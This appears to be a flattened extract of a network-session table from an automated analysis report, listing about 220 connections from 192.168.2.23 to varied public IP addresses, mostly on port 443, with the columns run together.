                                            23225192.168.2.235379862.224.130.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23226192.168.2.2360110139.122.15.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23227192.168.2.233426240.65.174.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23228192.168.2.2348760208.227.247.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23229192.168.2.2355970218.4.179.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23230192.168.2.2359308154.127.132.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23231192.168.2.235276068.128.121.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23232192.168.2.2339988133.138.127.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23233192.168.2.2337864199.155.130.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23234192.168.2.2338212191.159.218.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23235192.168.2.235822699.9.12.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23236192.168.2.2344164167.206.108.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23237192.168.2.233551618.96.254.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23238192.168.2.235822484.116.200.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23239192.168.2.235317289.45.41.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23240192.168.2.2341042180.151.147.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23241192.168.2.2345940216.189.167.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23242192.168.2.234244095.158.37.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23243192.168.2.2335944209.207.117.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23244192.168.2.235799263.129.74.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23245192.168.2.2342398158.159.42.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23246192.168.2.2354290166.238.14.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23247192.168.2.2344984121.182.114.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23248192.168.2.2354882217.92.70.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23249192.168.2.235515898.98.91.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23250192.168.2.234607261.237.112.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23251192.168.2.2342674186.191.57.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23252192.168.2.2336806162.80.220.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23253192.168.2.2337702217.199.22.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23254192.168.2.2352708164.24.222.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23255192.168.2.23432229.222.61.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23256192.168.2.234530478.157.184.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23257192.168.2.23584942.147.109.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23258192.168.2.2350982172.240.216.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23259192.168.2.233575866.144.198.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23260192.168.2.2353304160.244.10.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23261192.168.2.235594012.160.202.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23262192.168.2.233691062.159.103.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23263192.168.2.2357156190.22.164.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23264192.168.2.2338600115.237.208.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23265192.168.2.2356364143.88.111.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23266192.168.2.2334332152.2.199.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23267192.168.2.2346004170.83.255.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23268192.168.2.2339414172.234.254.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23269192.168.2.233854058.42.191.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23270192.168.2.2333902129.158.215.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23271192.168.2.235596463.179.212.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23272192.168.2.234137092.82.196.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23273192.168.2.2335672102.76.64.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23274192.168.2.2335426150.222.117.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23275192.168.2.2358734108.6.84.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23276192.168.2.234596012.98.13.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23277192.168.2.234394838.176.97.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23278192.168.2.233855070.239.131.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23279192.168.2.2338530153.141.114.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23280192.168.2.2336506158.212.7.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23281192.168.2.2359770175.246.147.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23282192.168.2.235702866.44.76.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23283192.168.2.2349576107.154.210.708080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23284192.168.2.2339490196.219.220.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23285192.168.2.233853045.108.195.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23286192.168.2.2351902161.218.110.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23287192.168.2.2344920184.162.96.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23288192.168.2.2344614207.168.239.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23289192.168.2.2347124193.54.161.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23290192.168.2.2336822171.26.203.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23291192.168.2.2347620110.242.16.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23292192.168.2.2348146202.3.255.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23293192.168.2.234693825.213.106.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23294192.168.2.23570805.62.227.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23295192.168.2.2350028125.113.106.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23296192.168.2.23407629.29.156.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23297192.168.2.2351220174.43.0.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23298192.168.2.235864274.89.192.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23299192.168.2.235322031.12.158.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23300192.168.2.2359226141.169.20.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23301192.168.2.234678253.130.230.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23302192.168.2.234595293.21.192.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23303192.168.2.2334548111.26.171.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23304192.168.2.2344390178.177.37.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23305192.168.2.2336660161.65.141.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23306192.168.2.234917097.145.21.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23307192.168.2.2347770191.110.225.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23308192.168.2.2332804115.238.53.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23309192.168.2.23547108.249.123.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23310192.168.2.2346404142.40.250.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23311192.168.2.2354358179.171.197.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23312192.168.2.2338042205.76.191.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23313192.168.2.2348142157.46.121.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23314192.168.2.2353590180.6.114.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23315192.168.2.233516493.249.237.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23316192.168.2.234065054.81.198.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23317192.168.2.2334620173.75.171.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23318192.168.2.234458632.5.163.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23319192.168.2.2336760157.102.160.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23320192.168.2.233453417.111.125.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23321192.168.2.2344734200.126.221.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23322192.168.2.233657818.50.232.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23323192.168.2.2359904121.229.238.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23324192.168.2.235679224.100.170.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23325192.168.2.2358468201.145.54.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23326192.168.2.2342678217.173.112.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23327192.168.2.2349780199.127.212.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23328192.168.2.23331428.177.2.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23329192.168.2.2336052211.97.58.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23330192.168.2.23525728.41.226.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23331192.168.2.2342134202.248.215.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23332192.168.2.234207280.56.233.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23333192.168.2.234385057.42.246.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23334192.168.2.2338582159.94.246.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23335192.168.2.2342128149.242.160.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23336192.168.2.2339850213.253.21.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23337192.168.2.233979668.65.129.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23338192.168.2.2348650186.120.100.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23339192.168.2.235031860.10.16.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23340192.168.2.2334256101.213.223.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23341192.168.2.2336176148.147.87.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23342192.168.2.2344786123.231.1.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23343192.168.2.2346550179.239.178.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23344192.168.2.234625059.70.146.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23345192.168.2.2333462123.13.172.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23346192.168.2.2359636136.41.246.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23347192.168.2.233984241.126.119.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23348192.168.2.2360800219.139.206.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23349192.168.2.233550277.101.22.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23350192.168.2.2345920126.120.182.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23351192.168.2.2339506218.168.172.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23352192.168.2.233805678.210.177.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23353192.168.2.235924442.86.125.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23354192.168.2.2334780210.231.190.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23355192.168.2.2344266190.21.136.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23356192.168.2.234364648.231.195.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23357192.168.2.2339810217.133.189.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23358192.168.2.2343650206.120.4.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23359192.168.2.23347281.1.176.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23360192.168.2.2340420157.52.137.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23361192.168.2.235697454.136.163.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23362192.168.2.2346368170.107.28.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23363192.168.2.234533844.61.4.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23364192.168.2.234349699.118.235.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23365192.168.2.2359220187.27.136.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23366192.168.2.234964299.177.55.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23367192.168.2.234968459.105.229.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23368192.168.2.233364044.31.46.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23369192.168.2.2344968170.31.71.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23370192.168.2.233906417.36.253.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23371192.168.2.2340818100.34.234.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23372192.168.2.2356088156.205.117.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23373192.168.2.2341080196.182.56.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23374192.168.2.235948812.92.10.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23375192.168.2.233325218.1.27.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23376192.168.2.233772462.163.132.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23377192.168.2.233341646.247.25.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23378192.168.2.2354552136.223.110.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23379192.168.2.2338738133.109.34.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23380192.168.2.233616023.228.253.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23381192.168.2.235853099.204.147.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23382192.168.2.2354066115.91.72.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23383192.168.2.2347172153.48.222.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23384192.168.2.2356862174.201.141.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23385192.168.2.234599093.252.80.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23386192.168.2.2359960169.148.47.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23387192.168.2.234593420.253.220.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23388192.168.2.2351254146.138.106.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23389192.168.2.23402465.231.223.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23390192.168.2.2342154205.187.239.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23391192.168.2.234408494.25.46.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23392192.168.2.23569285.49.108.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23393192.168.2.2347458199.254.40.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23394192.168.2.2337254208.55.223.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23395192.168.2.2351752107.201.28.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23396192.168.2.2359112164.142.189.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23397192.168.2.234179832.85.204.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23398192.168.2.2336928213.244.100.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23399192.168.2.2358928188.116.49.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23400192.168.2.2334846138.6.51.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23401192.168.2.2349458142.23.7.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23402192.168.2.233851832.237.180.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23403192.168.2.233419463.45.246.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23404192.168.2.2343798120.43.40.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23405192.168.2.2347814138.28.253.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23406192.168.2.234741445.189.255.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23407192.168.2.2353694186.248.26.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23408192.168.2.2360468162.7.100.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23409192.168.2.2342778167.76.49.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23410192.168.2.2335814145.191.232.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23411192.168.2.235919450.200.33.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23412192.168.2.233854648.111.74.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23413192.168.2.235962448.190.198.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23414192.168.2.2342898154.116.108.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23415192.168.2.2334422220.130.249.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23416192.168.2.2332788131.252.94.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23417192.168.2.234217053.85.31.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23418192.168.2.2355980154.75.121.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23419192.168.2.2355262107.121.156.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23420192.168.2.2336640125.86.83.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23421192.168.2.235778041.35.94.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23422192.168.2.2355580220.201.133.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23423192.168.2.2336120107.166.115.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23424192.168.2.23339605.210.127.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23425192.168.2.2338736115.52.133.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23426192.168.2.2358430154.38.150.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23427192.168.2.235981484.96.207.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23428192.168.2.2337872133.114.255.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23429192.168.2.2350484138.243.152.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23430192.168.2.2343468219.134.196.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23431192.168.2.2347800158.180.78.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23432192.168.2.2345236120.63.196.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23433192.168.2.2357518190.94.54.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23434192.168.2.2357256141.117.162.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23435192.168.2.2349654189.80.19.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23436192.168.2.234201438.220.114.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23437192.168.2.2360014121.48.128.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23438192.168.2.2339904198.118.225.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23439192.168.2.2337738184.156.26.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23440192.168.2.235047844.229.152.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23441192.168.2.234759880.154.90.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23442192.168.2.2344956116.53.132.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23443192.168.2.23475028.130.22.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23444192.168.2.2346798197.162.34.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23445192.168.2.2351536100.19.105.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23446192.168.2.234520499.45.104.54443
                                            TimestampBytes transferredDirectionData


